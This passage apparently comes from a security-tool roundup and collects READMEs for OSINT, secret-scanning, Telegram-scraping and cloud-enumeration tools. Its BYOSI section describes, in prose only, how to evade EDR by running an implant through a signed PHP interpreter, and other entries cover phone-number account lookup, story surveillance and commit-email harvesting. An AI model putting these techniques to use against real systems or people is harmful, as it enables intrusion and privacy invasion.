    maryam -e google -q "<QUERY>"
    maryam -e dnsbrute -d domain.tld
    # Show framework modules
    maryam -e show modules
    # Set framework options.
    maryam -e set proxy ..
    maryam -e set agent ..
    maryam -e set timeout ..
    # Run web API
    maryam -e web api 127.0.0.1 1313

    Contribution

Here is a starting guide: Development Guide. You can add a new search engine to the util classes, or use the current search engines to write a new module. The best help for writing a new module is studying the current modules.

    Roadmap

    • Write a language model based search

    Links

    OWASP

    Wiki

    Install

    Modules Guide

    Development Guide

    To report bugs, requests, or any other issues please create an issue.



    TruffleHog Explorer - A User-Friendly Web-Based Tool To Visualize And Analyze Data Extracted Using TruffleHog



Welcome to TruffleHog Explorer, a user-friendly web-based tool to visualize and analyze data extracted using TruffleHog. TruffleHog is one of the most powerful open-source tools for secrets discovery, classification, validation, and analysis. In this context, a secret refers to a credential a machine uses to authenticate itself to another machine. This includes API keys, database passwords, private encryption keys, and more.

    With an improved UI/UX, powerful filtering options, and export capabilities, this tool helps security professionals efficiently review potential secrets and credentials found in their repositories.

⚠️ This dashboard has been tested only with GitHub TruffleHog JSON outputs. Expect updates soon to support additional formats and platforms.

    You can use online version here: TruffleHog Explorer


🚀 Features

• Intuitive UI/UX: Beautiful pastel theme with smooth navigation.
• Powerful Filtering:
  • Filter findings by repository, detector type, and uploaded file.
  • Flexible date range selection with a calendar picker.
  • Verification status categorization for effective review.
  • Advanced search capabilities for faster identification.
• Batch Operations:
  • Verify or reject multiple findings with a single click.
  • Toggle visibility of rejected results for a streamlined view.
  • Bulk processing to manage large datasets efficiently.
• Export Capabilities:
  • Export verified secrets or filtered findings effortlessly.
  • Save and load session backups for continuity.
  • Generate reports in multiple formats (JSON, CSV).
• Dynamic Sorting:
  • Sort results by repository, date, or verification status.
  • Customizable sorting preferences for a personalized experience.

📥 Installation & Usage

    1. Clone the Repository

    $ git clone https://github.com/yourusername/trufflehog-explorer.git
    $ cd trufflehog-explorer

    2. Open the index.html

    Simply open the index.html file in your preferred web browser.

    $ open index.html

📂 How to Use

1. Upload TruffleHog JSON findings:
   • Click on the "Load Data" section and select your .json files from TruffleHog output.
   • Multiple files are supported.
2. Apply filters:
   • Choose filters such as repository, detector type, and verification status.
   • Utilize the date range picker to narrow down findings.
   • Leverage the search function to locate specific findings quickly.
3. Review findings:
   • Click on a finding to expand and view its details.
   • Use the action buttons to verify or reject findings.
   • Add comments and annotations for better tracking.
4. Export results:
   • Export verified or filtered findings for reporting.
   • Save session data for future review and analysis.
5. Save your progress:
   • Save your session and resume later without losing any progress.
   • Automatic backup feature to prevent data loss.

Happy Securing! 🔒



    PANO - Advanced OSINT Investigation Platform Combining Graph Visualization, Timeline Analysis, And AI Assistance To Uncover Hidden Connections In Data



    PANO is a powerful OSINT investigation platform that combines graph visualization, timeline analysis, and AI-powered tools to help you uncover hidden connections and patterns in your data.

    Getting Started

1. Clone the repository:

   git clone https://github.com/ALW1EZ/PANO.git
   cd PANO

2. Run the application:
   • Linux: ./start_pano.sh
   • Windows: start_pano.bat

The startup script will automatically:
• Check for updates
• Set up the Python environment
• Install dependencies
• Launch PANO

To use the Email Lookup transform, you need to log in with GHunt first. After starting PANO via the starter scripts:

1. Select the venv manually:
   • Linux: source venv/bin/activate
   • Windows: call venv\Scripts\activate
2. See how to log in here

💡 Quick Start Guide

    1. Create Investigation: Start a new investigation or load an existing one
    2. Add Entities: Drag entities from the sidebar onto the graph
    3. Discover Connections: Use transforms to automatically find relationships
    4. Analyze: Use timeline and map views to understand patterns
    5. Save: Export your investigation for later use

    πŸ” Features

    πŸ•ΈοΈ Core Functionality

    • Interactive Graph Visualization
    • Drag-and-drop entity creation
    • Multiple layout algorithms (Circular, Hierarchical, Radial, Force-Directed)
    • Dynamic relationship mapping
    • Visual node and edge styling

    • Timeline Analysis

    • Chronological event visualization
    • Interactive timeline navigation
    • Event filtering and grouping
    • Temporal relationship analysis

    • Map Integration

    • Geographic data visualization
    • Location-based analysis
    • Interactive mapping features
    • Coordinate plotting and tracking

🎯 Entity Management

• Supported Entity Types
  • 📧 Email addresses
  • 👤 Usernames
  • 🌐 Websites
  • 🖼️ Images
  • 📍 Locations
  • ⏰ Events
  • 📝 Text content
  • 🔧 Custom entity types

🔄 Transform System

• Email Analysis
  • Google account investigation
  • Calendar event extraction
  • Location history analysis
  • Connected services discovery

• Username Analysis
  • Cross-platform username search
  • Social media profile discovery
  • Platform correlation
  • Web presence analysis

• Image Analysis
  • Reverse image search
  • Visual content analysis
  • Metadata extraction
  • Related image discovery

🤖 AI Integration

• PANAI
  • Natural language investigation assistant
  • Automated entity extraction and relationship mapping
  • Pattern recognition and anomaly detection
  • Multi-language support
  • Context-aware suggestions
  • Timeline and graph analysis

🧩 Core Components

📦 Entities

    Entities are the fundamental building blocks of PANO. They represent distinct pieces of information that can be connected and analyzed:

    • Built-in Types
    • πŸ“§ Email: Email addresses with service detection
    • πŸ‘€ Username: Social media and platform usernames
    • 🌐 Website: Web pages with metadata
    • πŸ–ΌοΈ Image: Images with EXIF and analysis
    • πŸ“ Location: Geographic coordinates and addresses
    • ⏰ Event: Time-based occurrences
    • πŸ“ Text: Generic text content

    • Properties System

    • Type-safe property validation
    • Automatic property getters
    • Dynamic property updates
    • Custom property types
    • Metadata support

⚡ Transforms

    Transforms are automated operations that process entities to discover new information and relationships:

    • Operation Types
    • πŸ” Discovery: Find new entities from existing ones
    • πŸ”— Correlation: Connect related entities
    • πŸ“Š Analysis: Extract insights from entity data
    • 🌐 OSINT: Gather open-source intelligence
    • πŸ”„ Enrichment: Add data to existing entities

    • Features

    • Async operation support
    • Progress tracking
    • Error handling
    • Rate limiting
    • Result validation

    πŸ› οΈ Helpers

    Helpers are specialized tools with dedicated UIs for specific investigation tasks:

    • Available Helpers
    • πŸ” Cross-Examination: Analyze statements and testimonies
    • πŸ‘€ Portrait Creator: Generate facial composites
    • πŸ“Έ Media Analyzer: Advanced image processing and analysis
    • πŸ” Base Searcher: Search near places of interest
    • πŸ”„ Translator: Translate text between languages

    • Helper Features

    • Custom Qt interfaces
    • Real-time updates
    • Graph integration
    • Data visualization
    • Export capabilities

👥 Contributing

    We welcome contributions! To contribute to PANO:

1. Fork the repository at https://github.com/ALW1EZ/PANO/
2. Make your changes in your fork
3. Test your changes thoroughly
4. Create a Pull Request to our main branch
5. In your PR description, include:
   • What the changes do
   • Why you made these changes
   • Any testing you've done
   • Screenshots if applicable

    Note: We use a single main branch for development. All pull requests should be made directly to main.

📖 Development Guide

System Requirements

• Operating System: Windows or Linux
• Python 3.11+
• PySide6 for GUI
• Internet connection for online features

Custom Entities

Entities are the core data structures in PANO. Each entity represents a piece of information with specific properties and behaviors. To create a custom entity:

1. Create a new file in the `entities` folder (e.g., `entities/phone_number.py`)
2. Implement your entity class:
from dataclasses import dataclass
from typing import ClassVar, Dict, Any
from .base import Entity

@dataclass
class PhoneNumber(Entity):
    name: ClassVar[str] = "Phone Number"
    description: ClassVar[str] = "A phone number entity with country code and validation"

    def init_properties(self):
        """Initialize phone number properties"""
        self.setup_properties({
            "number": str,
            "country_code": str,
            "carrier": str,
            "type": str,  # mobile, landline, etc.
            "verified": bool
        })

    def update_label(self):
        """Update the display label"""
        self.label = self.format_label(["country_code", "number"])
Custom Transforms

Transforms are operations that process entities and generate new insights or relationships. To create a custom transform:

1. Create a new file in the `transforms` folder (e.g., `transforms/phone_lookup.py`)
2. Implement your transform class:
from dataclasses import dataclass
from typing import ClassVar, List
from .base import Transform
from entities.base import Entity
from entities.phone_number import PhoneNumber
from entities.location import Location
from ui.managers.status_manager import StatusManager

@dataclass
class PhoneLookup(Transform):
    name: ClassVar[str] = "Phone Number Lookup"
    description: ClassVar[str] = "Lookup phone number details and location"
    input_types: ClassVar[List[str]] = ["PhoneNumber"]
    output_types: ClassVar[List[str]] = ["Location"]

    async def run(self, entity: PhoneNumber, graph) -> List[Entity]:
        if not isinstance(entity, PhoneNumber):
            return []

        status = StatusManager.get()
        operation_id = status.start_loading("Phone Lookup")

        try:
            # Your phone number lookup logic here
            # Example: query an API for phone number details
            location = Location(properties={
                "country": "Example Country",
                "region": "Example Region",
                "carrier": "Example Carrier",
                "source": "PhoneLookup transform"
            })
            return [location]

        except Exception as e:
            status.set_text(f"Error during phone lookup: {str(e)}")
            return []

        finally:
            status.stop_loading(operation_id)
Custom Helpers

Helpers are specialized tools that provide additional investigation capabilities through a dedicated UI interface. To create a custom helper:

1. Create a new file in the `helpers` folder (e.g., `helpers/data_analyzer.py`)
2. Implement your helper class:
from PySide6.QtWidgets import (
    QWidget, QVBoxLayout, QHBoxLayout, QPushButton,
    QTextEdit, QLabel, QComboBox
)
from .base import BaseHelper
from qasync import asyncSlot

class DummyHelper(BaseHelper):
    """A dummy helper for testing"""

    name = "Dummy Helper"
    description = "A dummy helper for testing"

    def setup_ui(self):
        """Initialize the helper's user interface"""
        # Create input text area
        self.input_label = QLabel("Input:")
        self.input_text = QTextEdit()
        self.input_text.setPlaceholderText("Enter text to process...")
        self.input_text.setMinimumHeight(100)

        # Create operation selector
        operation_layout = QHBoxLayout()
        self.operation_label = QLabel("Operation:")
        self.operation_combo = QComboBox()
        self.operation_combo.addItems(["Uppercase", "Lowercase", "Title Case"])
        operation_layout.addWidget(self.operation_label)
        operation_layout.addWidget(self.operation_combo)

        # Create process button
        self.process_btn = QPushButton("Process")
        self.process_btn.clicked.connect(self.process_text)

        # Create output text area
        self.output_label = QLabel("Output:")
        self.output_text = QTextEdit()
        self.output_text.setReadOnly(True)
        self.output_text.setMinimumHeight(100)

        # Add widgets to main layout
        self.main_layout.addWidget(self.input_label)
        self.main_layout.addWidget(self.input_text)
        self.main_layout.addLayout(operation_layout)
        self.main_layout.addWidget(self.process_btn)
        self.main_layout.addWidget(self.output_label)
        self.main_layout.addWidget(self.output_text)

        # Set dialog size
        self.resize(400, 500)

    @asyncSlot()
    async def process_text(self):
        """Process the input text based on selected operation"""
        text = self.input_text.toPlainText()
        operation = self.operation_combo.currentText()

        if operation == "Uppercase":
            result = text.upper()
        elif operation == "Lowercase":
            result = text.lower()
        else:  # Title Case
            result = text.title()

        self.output_text.setPlainText(result)

📄 License

    This project is licensed under the Creative Commons Attribution-NonCommercial (CC BY-NC) License.

You are free to:
• ✅ Share: Copy and redistribute the material
• ✅ Adapt: Remix, transform, and build upon the material

Under these terms:
• ℹ️ Attribution: You must give appropriate credit
• 🚫 NonCommercial: No commercial use
• 🔓 No additional restrictions

    πŸ™ Acknowledgments

    Special thanks to all library authors and contributors who made this project possible.

👨‍💻 Author

Created by ALW1EZ with AI ❤️



    Telegram-Checker - A Python Tool For Checking Telegram Accounts Via Phone Numbers Or Usernames



    Enhanced version of bellingcat's Telegram Phone Checker!

A Python script to check Telegram accounts using phone numbers or usernames.


✨ Features

• 🔍 Check single or multiple phone numbers and usernames
• 📁 Import numbers from a text file
• 📸 Auto-download profile pictures
• 💾 Save results as JSON
• 🔐 Secure credential storage
• 📊 Detailed user information

🚀 Installation

1. Clone the repository:

   git clone https://github.com/unnohwn/telegram-checker.git
   cd telegram-checker

2. Install required packages:

   pip install -r requirements.txt

📦 Requirements

    Contents of requirements.txt:

    telethon
    rich
    click
    python-dotenv

    Or install packages individually:

    pip install telethon rich click python-dotenv

    βš™οΈ Configuration

    First time running the script, you'll need: - Telegram API credentials (get from https://my.telegram.org/apps) - Your Telegram phone number including countrycode + - Verification code (sent to your Telegram)
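Under the hood, checkers like this typically use Telethon's contact-import trick: temporarily add the phone number as a contact, see whether a Telegram user comes back, then clean up. A minimal sketch of the pattern (my illustration, not this repo's exact code; fill in your own api_id/api_hash):

from telethon.sync import TelegramClient
from telethon import functions, types

API_ID = 12345          # your credentials from https://my.telegram.org/apps
API_HASH = "your_hash"

with TelegramClient("checker_session", API_ID, API_HASH) as client:
    contact = types.InputPhoneContact(
        client_id=0, phone="+15551234567", first_name="tmp", last_name=""
    )
    result = client(functions.contacts.ImportContactsRequest([contact]))
    if result.users:
        user = result.users[0]
        print(user.id, user.username, user.first_name)
        # Remove the temporary contact again
        client(functions.contacts.DeleteContactsRequest(id=[user]))
    else:
        print("No Telegram account found for that number")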

💻 Usage

    Run the script:

    python telegram_checker.py

Choose from the options:
1. Check phone numbers from input
2. Check phone numbers from file
3. Check usernames from input
4. Check usernames from file
5. Clear saved credentials
6. Exit

📂 Output

Results are saved in:
• results/ - JSON files with detailed information
• profile_photos/ - Downloaded profile pictures

⚠️ Note

    This tool is for educational purposes only. Please respect Telegram's terms of service and user privacy.

📄 License

    MIT License



    Telegram-Scraper - A Powerful Python Script That Allows You To Scrape Messages And Media From Telegram Channels Using The Telethon Library



    A powerful Python script that allows you to scrape messages and media from Telegram channels using the Telethon library. Features include real-time continuous scraping, media downloading, and data export capabilities.


Features 🚀

• Scrape messages from multiple Telegram channels
• Download media files (photos, documents)
• Real-time continuous scraping
• Export data to JSON and CSV formats
• SQLite database storage
• Resume capability (saves progress)
• Media reprocessing for failed downloads
• Progress tracking
• Interactive menu interface

Prerequisites 📋

Before running the script, you'll need:

• Python 3.7 or higher
• A Telegram account
• API credentials from Telegram

    Required Python packages

    pip install -r requirements.txt

    Contents of requirements.txt:

    telethon
    aiohttp
    asyncio

Getting Telegram API Credentials 🔑

1. Visit https://my.telegram.org/auth
2. Log in with your phone number
3. Click on "API development tools"
4. Fill in the form:
   • App title: Your app name
   • Short name: Your app short name
   • Platform: Can be left as "Desktop"
   • Description: Brief description of your app
5. Click "Create application"
6. You'll receive:
   • api_id: A number
   • api_hash: A string of letters and numbers

    Keep these credentials safe, you'll need them to run the script!

Setup and Running 🔧

1. Clone the repository:

   git clone https://github.com/unnohwn/telegram-scraper.git
   cd telegram-scraper

2. Install requirements:

   pip install -r requirements.txt

3. Run the script:

   python telegram-scraper.py

4. On first run, you'll be prompted to enter:
   • Your API ID
   • Your API Hash
   • Your phone number (with country code), or a bot token; if prompted a second time, use the phone number option
   • Verification code (sent to your Telegram)

Initial Scraping Behavior 🕒

    When scraping a channel for the first time, please note:

    • The script will attempt to retrieve the entire channel history, starting from the oldest messages
    • Initial scraping can take several minutes or even hours, depending on:
    • The total number of messages in the channel
    • Whether media downloading is enabled
    • The size and number of media files
    • Your internet connection speed
    • Telegram's rate limiting
    • The script uses pagination and maintains state, so if interrupted, it can resume from where it left off
    • Progress percentage is displayed in real-time to track the scraping status
    • Messages are stored in the database as they are scraped, so you can start analyzing available data even before the scraping is complete

Usage 📝

    The script provides an interactive menu with the following options:

    • [A] Add new channel
    • Enter the channel ID or channelname
    • [R] Remove channel
    • Remove a channel from scraping list
    • [S] Scrape all channels
    • One-time scraping of all configured channels
    • [M] Toggle media scraping
    • Enable/disable downloading of media files
    • [C] Continuous scraping
    • Real-time monitoring of channels for new messages
    • [E] Export data
    • Export to JSON and CSV formats
    • [V] View saved channels
    • List all saved channels
    • [L] List account channels
    • List all channels with ID:s for account
    • [Q] Quit

Channel IDs 📒

You can use either:
• Channel username (e.g., channelname)
• Channel ID (e.g., -1001234567890)

Data Storage 💾

    Database Structure

Data is stored in SQLite databases, one per channel:
• Location: ./channelname/channelname.db
• Table: messages
  • id: Primary key
  • message_id: Telegram message ID
  • date: Message timestamp
  • sender_id: Sender's Telegram ID
  • first_name: Sender's first name
  • last_name: Sender's last name
  • username: Sender's username
  • message: Message text
  • media_type: Type of media (if any)
  • media_path: Local path to downloaded media
  • reply_to: ID of replied message (if any)
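Because each channel lands in a plain SQLite file, you can analyze scraped data with the standard library alone. A small sketch (assuming a channel already scraped into ./channelname/channelname.db with the schema above):

import sqlite3

# Path follows the layout above; adjust for your channel name.
conn = sqlite3.connect("./channelname/channelname.db")
conn.row_factory = sqlite3.Row

# Ten most recent messages that contain a link
rows = conn.execute(
    """SELECT date, username, message FROM messages
       WHERE message LIKE '%http%'
       ORDER BY date DESC LIMIT 10"""
).fetchall()

for row in rows:
    print(row["date"], row["username"], row["message"][:80])
conn.close()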

Media Storage 📁

Media files are stored in:
• Location: ./channelname/media/
• Files are named using the message ID or the original filename

Exported Data 📊

Data can be exported in two formats:

1. CSV: ./channelname/channelname.csv
   • Human-readable spreadsheet format
   • Easy to import into Excel/Google Sheets
2. JSON: ./channelname/channelname.json
   • Structured data format
   • Ideal for programmatic processing

Features in Detail 🔍

Continuous Scraping

The continuous scraping feature ([C] option) allows you to:
• Monitor channels in real time
• Automatically download new messages
• Download media as it's posted
• Run indefinitely until interrupted (Ctrl+C)
• Maintain state between runs

Media Handling

The script can download:
• Photos
• Documents
• Other media types supported by Telegram

It automatically retries failed downloads and skips existing files to avoid duplicates.

Error Handling 🛠️

The script includes:
• Automatic retry mechanism for failed media downloads
• State preservation in case of interruption
• Flood control compliance
• Error logging for failed operations

Limitations ⚠️

• Respects Telegram's rate limits
• Can only access public channels or channels you're a member of
• Media download size limits apply as per Telegram's restrictions

Contributing 🤝

    Contributions are welcome! Please feel free to submit a Pull Request.

License 📄

    This project is licensed under the MIT License - see the LICENSE file for details.

Disclaimer ⚖️

This tool is for educational purposes only. Make sure to:
• Respect Telegram's Terms of Service
• Obtain necessary permissions before scraping
• Use responsibly and ethically
• Comply with data protection regulations



    Telegram-Story-Scraper - A Python Script That Allows You To Automatically Scrape And Download Stories From Your Telegram Friends



    A Python script that allows you to automatically scrape and download stories from your Telegram friends using the Telethon library. The script continuously monitors and saves both photos and videos from stories, along with their metadata.


Important Note About Story Access ⚠️

Due to Telegram API restrictions, this script can only access stories from:
• Users you have added to your friend list
• Users whose privacy settings allow you to view their stories

    This is a limitation of Telegram's API and cannot be bypassed.

Features 🚀

• Automatically scrapes all available stories from your Telegram friends
• Downloads both photos and videos from stories
• Stores metadata in a SQLite database
• Exports data to an Excel spreadsheet
• Real-time monitoring with customizable intervals
• Timestamps are set to UTC+2
• Maintains a record of previously downloaded stories
• Resume capability
• Automatic retry mechanism

Prerequisites 📋

Before running the script, you'll need:

• Python 3.7 or higher
• A Telegram account
• API credentials from Telegram
• Friends on Telegram whose stories you want to track

    Required Python packages

    pip install -r requirements.txt

    Contents of requirements.txt:

    telethon
    openpyxl
    schedule

Getting Telegram API Credentials 🔑

1. Visit https://my.telegram.org/auth
2. Log in with your phone number
3. Click on "API development tools"
4. Fill in the form:
   • App title: Your app name
   • Short name: Your app short name
   • Platform: Can be left as "Desktop"
   • Description: Brief description of your app
5. Click "Create application"
6. You'll receive:
   • api_id: A number
   • api_hash: A string of letters and numbers

    Keep these credentials safe, you'll need them to run the script!

Setup and Running 🔧

1. Clone the repository:

   git clone https://github.com/unnohwn/telegram-story-scraper.git
   cd telegram-story-scraper

2. Install requirements:

   pip install -r requirements.txt

3. Run the script:

   python TGSS.py

4. On first run, you'll be prompted to enter:
   • Your API ID
   • Your API Hash
   • Your phone number (with country code)
   • Verification code (sent to your Telegram)
   • Checking interval in seconds (default is 60)

How It Works 🔄

The script:
1. Connects to your Telegram account
2. Periodically checks for new stories from your friends
3. Downloads any new stories (photos/videos)
4. Stores metadata in a SQLite database
5. Exports information to an Excel file
6. Runs continuously until interrupted (Ctrl+C)
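The periodic check is exactly the kind of loop the bundled schedule package makes trivial. A sketch of the monitoring skeleton (my illustration of the pattern, not the repo's code; check_stories() stands in for the actual download logic):

import time
import schedule

def check_stories():
    # Placeholder: fetch active stories for each friend,
    # download new media, and record metadata in SQLite.
    print("Checking for new stories...")

# Run the check at the configured interval (default: 60 seconds)
schedule.every(60).seconds.do(check_stories)

while True:
    schedule.run_pending()
    time.sleep(1)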

Data Storage 💾

Database Structure (stories.db)

SQLite database containing:
• user_id: Telegram user ID of the story creator
• story_id: Unique story identifier
• timestamp: When the story was posted (UTC+2)
• filename: Local filename of the downloaded media

CSV and Excel Export (stories_export.csv/xlsx)

Export files containing the same information as the database, useful for:
• Easy viewing of story metadata
• Filtering and sorting
• Data analysis
• Sharing data with others

Media Storage 📁

• Photos are saved as: {user_id}_{story_id}.jpg
• Videos are saved with their original extension: {user_id}_{story_id}.{extension}
• All media files are saved in the script's directory

Features in Detail 🔍

Continuous Monitoring

• Customizable checking interval (default: 60 seconds)
• Runs continuously until manually stopped
• Maintains state between runs
• Avoids duplicate downloads

    Media Handling

    • Supports both photos and videos
    • Automatically detects media type
    • Preserves original quality
    • Generates unique filenames

Error Handling 🛠️

The script includes:

• An automatic retry mechanism for failed downloads
• Error logging for failed operations
• Connection error handling
• State preservation in case of interruption

    Limitations ⚠️

    • Subject to Telegram's rate limits
    • Stories must be currently active (not expired)
    • Media download size limits apply as per Telegram's restrictions

Contributing 🤝

    Contributions are welcome! Please feel free to submit a Pull Request.

License 📄

    This project is licensed under the MIT License - see the LICENSE file for details.

Disclaimer ⚖️

This tool is for educational purposes only. Make sure to:

• Respect Telegram's Terms of Service
• Obtain necessary permissions before scraping
• Use it responsibly and ethically
• Comply with data protection regulations
• Respect user privacy



    gitGRAB - This Tool Is Designed To Interact With The GitHub API And Retrieve Specific User Details, Repository Information, And Commit Emails For A Given User

    By: Unknown


    This tool is designed to interact with the GitHub API and retrieve specific user details, repository information, and commit emails for a given user.


    Install Requests

    pip install requests

    Execute the program

    python3 gitgrab.py
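For orientation, here is a minimal sketch of the kind of calls such a tool makes against the public GitHub REST API; this is not gitgrab.py's actual code, and unauthenticated requests are heavily rate-limited:

import requests

API = "https://api.github.com"

def commit_emails(user):
    # Walk the user's public repos and harvest author e-mails from commits.
    emails = set()
    repos = requests.get(f"{API}/users/{user}/repos", timeout=10).json()
    for repo in repos:
        commits = requests.get(
            f"{API}/repos/{user}/{repo['name']}/commits",
            params={"author": user, "per_page": 30},
            timeout=10,
        ).json()
        for c in commits:
            if isinstance(c, dict) and "commit" in c:
                emails.add(c["commit"]["author"]["email"])
    return emails

profile = requests.get(f"{API}/users/octocat", timeout=10).json()
print(profile.get("name"), profile.get("company"), profile.get("location"))
print(commit_emails("octocat"))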



    Snoop - OSINT Tool For Research Social Media Accounts By Username

    By: Unknown


OSINT tool for researching social media accounts by username


    Install Requests

pip install requests

Install BeautifulSoup

pip install beautifulsoup4

Execute the program

python3 snoop.py
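The general technique reduces to requesting profile URLs and checking the response. A minimal sketch follows; the site list and URL patterns are examples, not Snoop's actual data:

import requests

# Example URL patterns only; a real tool ships a much larger site list.
SITES = {
    "GitHub": "https://github.com/{}",
    "Reddit": "https://www.reddit.com/user/{}",
}

def probe(username):
    headers = {"User-Agent": "Mozilla/5.0"}  # some sites reject the default UA
    for site, pattern in SITES.items():
        url = pattern.format(username)
        r = requests.get(url, headers=headers, timeout=10)
        status = "found" if r.status_code == 200 else "not found"
        print(f"[{site}] {url} -> {r.status_code} ({status})")

probe("example_user")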



    BYOSI - Evade EDR's The Simple Way, By Not Touching Any Of The API's They Hook

    By: Unknown


Evade EDRs the simple way, by not touching any of the APIs they hook.

    Theory

    I've noticed that most EDRs fail to scan scripting files, treating them merely as text files. While this might be unfortunate for them, it's an opportunity for us to profit.

    Flashy methods like residing in memory or thread injection are heavily monitored. Without a binary signed by a valid Certificate Authority, execution is nearly impossible.

    Enter BYOSI (Bring Your Own Scripting Interpreter). Every scripting interpreter is signed by its creator, with each certificate being valid. Testing in a live environment revealed surprising results: a highly signatured PHP script from this repository not only ran on systems monitored by CrowdStrike and Trellix but also established an external connection without triggering any EDR detections. EDRs typically overlook script files, focusing instead on binaries for implant delivery. They're configured to detect high entropy or suspicious sections in binaries, not simple scripts.

    This attack method capitalizes on that oversight for significant profit. The PowerShell script's steps mirror what a developer might do when first entering an environment. Remarkably, just four lines of PowerShell code completely evade EDR detection, with Defender/AMSI also blind to it. Adding to the effectiveness, GitHub serves as a trusted deployer.


    What this script does

    The PowerShell script achieves EDR/AV evasion through four simple steps (technically 3):

    1.) It fetches the PHP archive for Windows and extracts it into a new directory named 'php' within 'C:\Temp'.
    2.) The script then proceeds to acquire the implant PHP script or shell, saving it in the same 'C:\Temp\php' directory.
3.) Following this, it executes the implant or shell using the whitelisted PHP binary (whose valid signature exempts it from most restrictions that would otherwise prevent it from running in the first place).

With these actions completed, congratulations: you now have an active shell on a CrowdStrike-monitored system. What's particularly amusing is that, if my memory serves me correctly, SentinelOne is unable to scan PHP file types. So, feel free to let your imagination run wild.

    Disclaimer.

I am in no way responsible for the misuse of this. This issue is a major blind spot in EDR protection; I am only bringing it to everyone's attention.

    Thanks Section

A big thanks to @im4x5yn74x for affectionately giving it the name BYOSI, and for helping with the test environment that brought this attack method to life.

    Edit

It appears as though MS Defender is now flagging the PHP script as malicious, but it is still fully allowing the PowerShell script to execute. So, modify the PHP script.

    Edit

Hello SentinelOne :) You might want to make sure that you are making links, not embeds.



    DockerSpy - DockerSpy Searches For Images On Docker Hub And Extracts Sensitive Information Such As Authentication Secrets, Private Keys, And More

    By: Unknown


    DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more.


    What is Docker?

    Docker is an open-source platform that automates the deployment, scaling, and management of applications using containerization technology. Containers allow developers to package an application and its dependencies into a single, portable unit that can run consistently across various computing environments. Docker simplifies the development and deployment process by ensuring that applications run the same way regardless of where they are deployed.

    About Docker Hub

    Docker Hub is a cloud-based repository where developers can store, share, and distribute container images. It serves as the largest library of container images, providing access to both official images created by Docker and community-contributed images. Docker Hub enables developers to easily find, download, and deploy pre-built images, facilitating rapid application development and deployment.

    Why OSINT on Docker Hub?

    Open Source Intelligence (OSINT) on Docker Hub involves using publicly available information to gather insights and data from container images and repositories hosted on Docker Hub. This is particularly important for identifying exposed secrets for several reasons:

    1. Security Audits: By analyzing Docker images, organizations can uncover exposed secrets such as API keys, authentication tokens, and private keys that might have been inadvertently included. This helps in mitigating potential security risks.

    2. Incident Prevention: Proactively searching for exposed secrets in Docker images can prevent security breaches before they happen, protecting sensitive information and maintaining the integrity of applications.

    3. Compliance: Ensuring that container images do not expose secrets is crucial for meeting regulatory and organizational security standards. OSINT helps verify that no sensitive information is unintentionally disclosed.

    4. Vulnerability Assessment: Identifying exposed secrets as part of regular security assessments allows organizations to address these vulnerabilities promptly, reducing the risk of exploitation by malicious actors.

    5. Enhanced Security Posture: Continuously monitoring Docker Hub for exposed secrets strengthens an organization's overall security posture, making it more resilient against potential threats.

    Utilizing OSINT on Docker Hub to find exposed secrets enables organizations to enhance their security measures, prevent data breaches, and ensure the confidentiality of sensitive information within their containerized applications.

    How DockerSpy Works

    DockerSpy obtains information from Docker Hub and uses regular expressions to inspect the content for sensitive information, such as secrets.
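As a toy illustration of that regex approach, the core loop boils down to something like the following; the two patterns here are common examples, not DockerSpy's actual rule set (which lives in its configuration files):

import re

PATTERNS = {
    "AWS access key ID": re.compile(r"AKIA[0-9A-Z]{16}"),
    "Private key header": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}

def scan(text, source):
    # Run every signature over the text and report matches with their origin.
    for label, rx in PATTERNS.items():
        for m in rx.finditer(text):
            print(f"[{source}] {label}: {m.group(0)[:40]}")

# In practice the scanned text would come from image layers, env vars and
# build history pulled from Docker Hub.
scan("ENV AWS_KEY=AKIAIOSFODNN7EXAMPLE", "example-image:latest")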

    Getting Started

    To use DockerSpy, follow these steps:

1. Installation: Clone the DockerSpy repository and install the required dependencies.
git clone https://github.com/UndeadSec/DockerSpy.git && cd DockerSpy && make
2. Usage: Run DockerSpy from the terminal.
dockerspy

    Custom Configurations

To customize DockerSpy configurations, edit the following files:

• Regular Expressions
• Ignored File Extensions

    Disclaimer

    DockerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.

    Contribution

    Contributions to DockerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.

    About the Author

    DockerSpy is developed and maintained by Alisson Moretto (UndeadSec)

    I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.

    Consider following me:



    Thanks

    Special thanks to @akaclandestine



    CloudBrute - Awesome Cloud Enumerator

    By: Unknown


    A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.

The complete writeup is available here.


    Motivation

We are always thinking about what we can automate to make black-box security testing easier. We discussed the idea of creating a multi-platform cloud brute-force hunter, mainly to find open buckets, apps, and databases hosted on the clouds, and possibly apps behind proxy servers.
Here is the list of issues in previous approaches that we tried to fix:

• Separated wordlists
• Lack of proper concurrency
• Lack of support for all major cloud providers
• Required authentication, keys, or cloud CLI access
• Outdated endpoints and regions
• Incorrect file storage detection
• Lack of support for proxies (useful for bypassing region restrictions)
• Lack of support for user agent randomization (useful for bypassing rare restrictions)
• Hard to use, poorly configured

    Features

    • Cloud detection (IPINFO API and Source Code)
    • Supports all major providers
    • Black-Box (unauthenticated)
    • Fast (concurrent)
    • Modular and easily customizable
• Cross Platform (Windows, Linux, macOS)
    • User-Agent Randomization
    • Proxy Randomization (HTTP, Socks5)

    Supported Cloud Providers

    Microsoft: - Storage - Apps

    Amazon: - Storage - Apps

    Google: - Storage - Apps

    DigitalOcean: - storage

    Vultr: - Storage

    Linode: - Storage

    Alibaba: - Storage

    Version

    1.0.0

    Usage

Just download the latest release for your operating system and follow the usage.

To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder containing a config.yaml file.

    It looks like this

providers: ["amazon","alibaba","microsoft","digitalocean","linode","vultr","google"] # supported providers
    environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
    proxytype: "http" # socks5 / http
    ipinfo: "" # IPINFO.io API KEY

For the IPINFO API, you can register and get a free key at IPINFO. The environments are used to generate URLs, such as test-keyword.target.region and test.keyword.target.region.
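As a rough illustration of that mutation scheme (CloudBrute itself is written in Go, and its real generator is more elaborate), in Python:

# Combine the keyword with environments and wordlist entries to build
# candidate names, which are then templated into provider URLs.
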